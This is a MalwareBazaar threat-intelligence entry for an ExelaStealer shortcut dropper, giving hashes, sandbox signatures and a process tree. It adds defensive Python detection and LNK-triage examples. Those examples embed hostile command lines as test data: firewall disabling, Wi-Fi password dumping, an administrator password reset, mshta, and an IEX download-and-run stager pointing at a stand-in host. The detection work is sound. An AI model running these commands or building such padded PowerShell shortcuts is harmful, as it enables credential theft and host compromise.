MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

ExelaStealer
Vendor detections: 10



SHA256 hash: a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de
SHA3-384 hash: 52337d6be6acb8160734c03a789d7b46e570a3219b75f1c0464fb9117369bcd9237585414816a6bcd6929bab946ca57c
SHA1 hash: 9e4b44b50e79de9a461cd1ff0027fd641bc747a4
MD5 hash: a6bbbc0fa1d897a9c5838f8cc0de53e1
humanhash: romeo-charlie-moon-indigo
File name: a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de
Signature: ExelaStealer
File size: 169'695 bytes
First seen: 2025-05-09 07:37:22 UTC
Last seen: Never
File type: Shortcut (lnk)
MIME type: application/x-ms-shortcut
ssdeep: 3072:MXB/mSMFdgEu5sQGcxVZYagzOEXo60RzHMKQ2/v4ErX5pv2dXU/mXY+xwTu:MXB/mSMFdgEuROe1HM/2YW/uUTu
TLSH: T16BF3BFE46D2262C0E959D2BD5497F0EBE00309AC5D13C2F34C5A07DB0AEBB587A5BC5E
Magika: lnk
Reporter: JAMESWT_WT
Tags: ExelaStealer gitlab-com-project-69565380 lnk

Intelligence


File Origin
# of uploads: 1
# of downloads: 104
Origin country: IT
Vendor Threat Intelligence

Verdict: Malicious
Score: 99.9%
Tags: obfuscated ransomware sage

Verdict: Malicious
File Type: LNK File - Malicious
Behaviour: BlacklistAPI detected

Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: obfuscated

Threat name: Python Stealer, Koadic, Babadeda, Exela
Detection: malicious
Classification: rans.phis.bank.troj.spyw.evad
Score: 100 / 100
Signature
Bypasses PowerShell execution policy
Detected generic credential text file
Detected unpacking (overwrites its own PE header)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Gathers network related connection and port information
Joe Sandbox ML detected suspicious sample
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Overwrites the password of the administrator account
Potential dropper URLs found in powershell memory
Powershell creates an autostart link
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Capture Wi-Fi password
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal WLAN passwords
Uses attrib.exe to hide files
Uses netsh to modify the Windows network and firewall settings
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Babadeda
Yara detected Exela Stealer
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Yara detected Koadic BAT payload
Yara detected Python Stealer
Yara detected Waltuhium Grabber
Yara detected WIFI Password Stealer
Behaviour
Behavior Graph (reconstructed from the graph export; node numbers in parentheses are the sandbox's own):
Behavior Graph ID: 1685144; Sample: mPKnZxX6wS.lnk; Startdate: 09/05/2025; Architecture: WINDOWS; Score: 100
Sample-level network: store1.gofile.io; raw.githubusercontent.com; 4 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Capture Wi-Fi password; 18 other signatures

Process tree:
powershell.exe (13), started by the shortcut
    dropped: C:\Users\user\AppData\Local\ixx.exe (PE32)
    signatures: Found many strings related to Crypto-Wallets (likely being stolen); Found suspicious powershell code related to unpacking or dynamic code loading; Powershell creates an autostart link; Powershell drops PE file
    ixx.exe (17)
        dropped: C:\Users\user\AppData\Local\Temp\...\50E3.bat (Non-ISO)
        signatures: Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for dropped file; Detected unpacking (overwrites its own PE header)
        cmd.exe (25)
            signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Bypasses PowerShell execution policy; 4 other signatures
            dos.exe (28)
                dropped: C:\Users\...\_quoting_c.cp313-win_amd64.pyd (PE32+); C:\Users\user\AppData\...\win32evtlog.pyd (PE32+); C:\Users\user\AppData\Local\...\win32api.pyd (PE32+); 35 other files (none is malicious)
                signatures: Multi AV Scanner detection for dropped file; Modifies the windows firewall; Tries to harvest and steal WLAN passwords; 2 other signatures
                dos.exe (37)
                    network: ip-api.com 208.95.112.1:80 (TUT-ASUS, United States); raw.githubusercontent.com 185.199.109.133:443 (FASTLYUS, Netherlands); 4 other IPs or domains
                    dropped: C:\Users\user\AppData\Local\...\Waltuhium.exe (PE32+); C:\Users\user\AppData\...\places.sqlite-shm (data); C:\Users\user\AppData\...\cookies.sqlite-shm (data); 10 other malicious files
                    signatures: Windows shortcut file (LNK) starts blacklisted processes; Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 5 other signatures
                    cmd.exe (42): Overwrites the password of the administrator account
                        systeminfo.exe (51): Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                            WmiPrvSE.exe (70)
                        9 other processes (66)
                            net1.exe (78); quser.exe (80); net1.exe (82); 2 other processes (84)
                    cmd.exe (45): Windows shortcut file (LNK) starts blacklisted processes
                        cmd.exe (54)
                            chcp.com (72)
                        conhost.exe (56)
                    cmd.exe (47)
                        cmd.exe (58)
                            chcp.com (74)
                        conhost.exe (60)
                    13 other processes (49): Tries to harvest and steal WLAN passwords
                        WMIC.exe (62): Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                        tasklist.exe (64)
                            Conhost.exe (76)
                        23 other processes (68)
            powershell.exe (32)
                network: gitlab.com 172.65.251.78:443 (CLOUDFLARENETUS, United States)
                dropped: C:\Users\user\AppData\Local\Temp\dos.exe (PE32+)
                signatures: Potential dropper URLs found in powershell memory
            conhost.exe (35)
    notepad.exe (21)
    conhost.exe (23)
Threat name: Win32.Trojan.Pantera
Status: Malicious
First seen: 2025-05-07 03:15:25 UTC
File Type: Binary
Extracted files: 19
AV detection: 11 of 24 (45.83%)
Threat level: 5/5

Malware family: exelastealer
Score: 10/10
Tags: family:exelastealer collection defense_evasion discovery execution persistence privilege_escalation pyinstaller spyware stealer
Behaviour
Collects information from the system
Detects videocard installed
Gathers network information
Gathers system information
Modifies registry class
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Browser Information Discovery
Detects Pyinstaller
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Wi-Fi Discovery
System Network Connections Discovery
Launches sc.exe
Enumerates processes with tasklist
Hide Artifacts: Hidden Files and Directories
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Network Service Discovery
Checks computer location settings
Clipboard Data
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies Windows Firewall
Grants admin privileges
Exela Stealer
Exelastealer family
Please note that we are no longer able to provide a coverage score for VirusTotal.
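The sandbox signatures and behaviour tags above (encoded and policy-bypassing PowerShell, Wi-Fi profile dumping, firewall changes, attrib hiding, an administrator password reset, mshta) describe what this chain does on the host but not what the corresponding process-creation events look like or how to match them. The following Python is an added example, not code from MalwareBazaar or any of the vendors shown here: a small set of image/command-line rules in the style of the Sigma rules named above, run over process events constructed in a Sysmon-like shape. The events, paths, PIDs, the payload string and the rule names are assumptions made for the demonstration and are not telemetry from this sample; the ATT&CK IDs are the standard technique numbers for each behaviour.

```python
"""Detection logic for the process-level behaviours the sandboxes flagged above
(encoded/bypassing PowerShell, Wi-Fi profile dumping, firewall changes, attrib
hiding, administrator password reset, mshta). Added example; the events below are
constructed in a Sysmon-like shape and are not telemetry from this sample."""
import re

# (rule, ATT&CK technique, image pattern, command-line pattern); both must match
RULES = [
    ("powershell_encoded_command", "T1059.001", r"(?:powershell|pwsh)\.exe$",
     r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"),
    ("powershell_execpolicy_bypass", "T1059.001", r"(?:powershell|pwsh)\.exe$",
     r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b"),
    ("wifi_password_capture", "T1016.002", r"netsh\.exe$",
     r"wlan\s+show\s+profiles?\b.*key\s*=\s*clear"),
    ("firewall_modification", "T1562.004", r"netsh\.exe$",
     r"(?:advfirewall|firewall)\s+(?:set|add|delete)\b"),
    ("hide_files_attrib", "T1564.001", r"attrib\.exe$", r"(?:^|\s)\+[hs]+\b"),
    # "net user <name> <value>" with a third token that is not a switch = password set
    ("admin_password_overwrite", "T1098", r"net1?\.exe$",
     r"\buser\s+administrator\s+(?!/)\S+"),
    ("admin_group_add", "T1098", r"net1?\.exe$",
     r"\blocalgroup\s+administrators\s+\S+\s+/add\b"),
    ("mshta_remote_script", "T1218.005", r"mshta\.exe$",
     r"https?://|javascript:|vbscript:"),
]
COMPILED = [(name, tid, re.compile(img, re.I), re.compile(cmd, re.I))
            for name, tid, img, cmd in RULES]


def match_event(event: dict) -> list:
    """Return (rule, technique) pairs whose image and command line both match."""
    image, cmd = event.get("Image", ""), event.get("CommandLine", "")
    return [(name, tid) for name, tid, img_re, cmd_re in COMPILED
            if img_re.search(image) and cmd_re.search(cmd)]


def scan(events: list) -> dict:
    """Group hits by rule, keeping the parent so the analyst can rebuild the chain."""
    hits = {}
    for ev in events:
        for rule, tid in match_event(ev):
            hits.setdefault(rule, []).append({
                "technique": tid, "pid": ev.get("ProcessId"),
                "parent": ev.get("ParentImage", ""), "cmd": ev.get("CommandLine", "")})
    return hits


SYS32 = r"C:\Windows\System32"
CMD = SYS32 + r"\cmd.exe"
# Constructed events mirroring the signature list; paths and values are assumptions
EVENTS = [
    {"ProcessId": 4100, "ParentImage": CMD,
     "Image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + "QQBCAEMARAA" * 4},
    {"ProcessId": 4120, "ParentImage": CMD, "Image": SYS32 + r"\netsh.exe",
     "CommandLine": 'netsh wlan show profile name="Home" key=clear'},
    {"ProcessId": 4136, "ParentImage": CMD, "Image": SYS32 + r"\netsh.exe",
     "CommandLine": "netsh advfirewall set allprofiles state off"},
    {"ProcessId": 4150, "ParentImage": CMD, "Image": SYS32 + r"\attrib.exe",
     "CommandLine": r"attrib +h +s C:\Users\user\AppData\Local\ixx.exe"},
    {"ProcessId": 4162, "ParentImage": SYS32 + r"\net.exe", "Image": SYS32 + r"\net1.exe",
     "CommandLine": "C:\\Windows\\system32\\net1 user Administrator Passw0rd!"},
    {"ProcessId": 4180, "ParentImage": CMD, "Image": SYS32 + r"\mshta.exe",
     "CommandLine": "mshta http://example.invalid/stage.hta"},
    {"ProcessId": 4190, "ParentImage": CMD, "Image": SYS32 + r"\tasklist.exe",
     "CommandLine": "tasklist /v"},                  # discovery only, no rule here
    {"ProcessId": 4200, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": SYS32 + r"\notepad.exe", "CommandLine": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for rule, found in scan(EVENTS).items():
        for h in found:
            print(f"{rule:30} {h['technique']:10} pid={h['pid']} {h['cmd']}")
```

Both the image and the command line have to match, so a `net user Administrator` query without a third token, or `tasklist /v` on its own, produce no hit; on real telemetry the parent chain recorded in each hit is what separates a dropper-launched `cmd.exe` from an administrator's console.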

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Base64_Encoded_Powershell_Directives
Rule name: Large_filesize_LNK
Author: @bartblaze
Description: Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.
Rule name: LNK_sospechosos
Author: Germán Fernández
Description: Detects suspicious .lnk files
Rule name: PS_in_LNK
Author: @bartblaze
Description: Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name: SUSP_XORed_MSDOS_Stub_Message
Author: Florian Roth
Description: Detects suspicious XORed MSDOS stub message
Reference: https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
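The rules above say what they match (PowerShell artefacts and base64 directives inside a shortcut, a shortcut over 100 KB) but not where those artefacts sit in the file. The following Python is an added example, not MalwareBazaar's code and not any of the rule authors' code: it parses a .lnk along the MS-SHLLINK layout (76-byte header, optional LinkTargetIDList and LinkInfo, then the ordered StringData fields), flags a PowerShell launcher, an execution-policy bypass, a hidden or minimised window and a `-EncodedCommand` payload (which it decodes from base64 UTF-16LE), applies the 100 KB threshold, and hashes the bytes as the record above does. The shortcut bytes, the payload one-liner, the padding block with a made-up ExtraData signature and all function names are constructed for the demonstration and are not taken from this sample; the accepted `-enc` parameter prefixes are a subset of what powershell.exe recognises.

```python
"""Static triage of a Windows shortcut (.lnk) laid out per MS-SHLLINK: parse the
header and StringData, then flag the PowerShell artefacts the rules above look
for. Added example; the shortcut bytes are constructed below, not the sample."""
import base64
import hashlib
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
# LinkFlags (MS-SHLLINK 2.1.1); StringData fields appear in this fixed order
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40)]
LARGE_LNK_BYTES = 100 * 1024        # threshold used by Large_filesize_LNK
SW_SHOWMINNOACTIVE = 7              # ShowCommand that keeps the window out of sight

PS_RE = re.compile(r"""(?:^|[\\\s"'])(?:powershell|pwsh)(?:\.exe)?\b""", re.I)
# a subset of the parameter prefixes powershell.exe accepts for -EncodedCommand
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
EP_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def parse_lnk(data: bytes) -> dict:
    """Walk header -> LinkTargetIDList -> LinkInfo -> StringData; ExtraData is ignored."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # characters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage(data: bytes) -> dict:
    """Return the parsed fields plus the indicators a LNK-dropper hunt cares about."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    target = " ".join(info.get(k, "") for k in ("name", "relative_path", "icon_location"))
    findings, decoded = [], None
    if PS_RE.search(args) or PS_RE.search(target):
        findings.append("powershell_launcher")
    if EP_RE.search(args):
        findings.append("execution_policy_bypass")
    if HIDDEN_RE.search(args):
        findings.append("hidden_window")
    enc = ENC_RE.search(args)
    if enc:
        findings.append("encoded_command")
        try:                                     # -EncodedCommand is base64 of UTF-16LE
            decoded = base64.b64decode(enc.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = None
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("minimised_window")
    if len(data) > LARGE_LNK_BYTES:
        findings.append("large_lnk")
    return {"fields": info, "findings": findings, "decoded_command": decoded,
            "size": len(data), "sha256": hashlib.sha256(data).hexdigest(),
            "md5": hashlib.md5(data).hexdigest()}


def build_lnk(relative_path: str, arguments: str, padding: int = 0,
              show_command: int = 1) -> bytes:
    """Constructed minimal Unicode shortcut: 76-byte header, two StringData fields,
    optional junk ExtraData block (inflates size the way padded droppers do)."""
    flags = 0x08 | 0x20 | IS_UNICODE                       # RelativePath + Arguments
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def field(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    extra = b""
    if padding:   # made-up block signature (assumption): parsers skip it by size
        extra = struct.pack("<II", 8 + padding, 0xA0000FFF) + b"\x00" * padding
    return header + field(relative_path) + field(arguments) + extra + struct.pack("<I", 0)


# Constructed payload (assumption, not the sample's): a typical stager one-liner
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       f"-w hidden -ep bypass -enc {ENCODED}",
                       padding=120_000, show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    report = triage(SAMPLE_LNK)
    print(report["findings"], report["size"], report["sha256"])
    print(report["decoded_command"])
```

On a real file, `triage(open(path, "rb").read())` gives the same report; the parser deliberately stops before ExtraData, because the StringData fields are where a launcher's command line lives, and a shortcut whose size comes from padding after them still parses cleanly while tripping the size check.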

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malware family: ExelaStealer
File type: Shortcut (lnk)
SHA256: a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de (this sample)

Comments